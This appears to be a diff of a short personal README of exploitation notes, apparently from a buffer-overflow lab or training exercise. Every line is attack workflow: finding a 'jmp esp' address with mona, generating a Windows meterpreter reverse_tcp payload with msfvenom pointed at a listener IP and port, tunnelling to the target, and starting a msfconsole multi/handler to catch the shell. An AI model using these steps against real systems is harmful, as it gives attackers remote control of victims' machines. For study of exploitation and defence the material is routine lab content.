TrevorUken/security-/README.md

-type this !mona jmp -r esp -m "<the dll>" convert address to big endian make payload :  msfvenom -p windows/meterpreter/reverse_tcp lhost=10.50.41.112 lport=4444 -b "\x00" -f python
+type this !mona jmp -r esp -m "<the dll>" convert address to big endian make payload :  msfvenom -p windows/meterpreter/reverse_tcp lhost=10.50.41.112 lport=4444 -b "\x00" -f python tunnel to the box connected to the secure server port set the script port to: 127.0.0.1:<the tunnel port>
-msfconsole: use multi/handler set payload to what we used, set lhost to 0.0.0.0 and lport to the one we used, run
+msfconsole: use multi/handler set payload to what we used, set lhost to 0.0.0.0 and lport to the one we used, run run the script

 -------------------------------------------------------------------------------------------------------------------------------------------------------